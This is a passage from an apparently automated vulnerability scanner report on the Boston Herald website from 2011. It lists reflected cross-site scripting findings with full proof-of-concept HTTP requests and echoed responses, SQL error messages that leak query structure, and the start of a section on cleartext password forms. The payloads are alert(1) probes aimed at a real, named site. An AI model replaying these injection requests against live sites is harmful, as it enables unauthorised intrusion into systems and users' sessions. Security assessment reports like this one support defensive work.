Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?eb58b(a)bc791e733d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?eb58b(a)bc791e733d=1 LIMIT 0,20' at line 1
...[SNIP]...

2.36. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b364'-alert(1)-'a0ab3d5c958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?4b364'-alert(1)-'a0ab3d5c958=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 395
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.37. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48b0d(a)6246e4e221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?48b0d(a)6246e4e221=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 367
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?48b0d(a)6246e4e221=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?48b0d(a)6246e4e221=1 LIMIT 0,20' at line 1
...[SNIP]...

2.38. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a52a7'-alert(1)-'3fe2c2f08cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?a52a7'-alert(1)-'3fe2c2f08cd=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.39. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29cc'-alert(1)-'a2f2f71b2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?e29cc'-alert(1)-'a2f2f71b2c7=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 401
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.40. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4ac7(a)0dc08ce248a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?f4ac7(a)0dc08ce248a=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 374
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?f4ac7(a)0dc08ce248a=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4ac7(a)0dc08ce248a=1 LIMIT 0,20' at line
...[SNIP]...

2.41. http://www.bostonherald.com/search/ [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60651</script><script>alert(1)</script>03fb46f749a was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?topic=Rep.+James+Vallee60651</script><script>alert(1)</script>03fb46f749a&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script language="Javascript">
// Ajax search


page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Rep. James Vallee60651</script><script>alert(1)</script>03fb46f749a');
//pageTracker._trackPageview('/search/index.bg?&amp;order=&amp;page=1');
location.hash='articleFull';
</script>
...[SNIP]...

2.42. http://www.bostonherald.com/search/ [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2820"><script>alert(1)</script>647d2a3054 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Rep.+James+Valleec2820"><script>alert(1)</script>647d2a3054&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Rep. James Valleec2820"><script>alert(1)</script>647d2a3054" name="topic" />
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 21 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.2. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.3. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.4. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
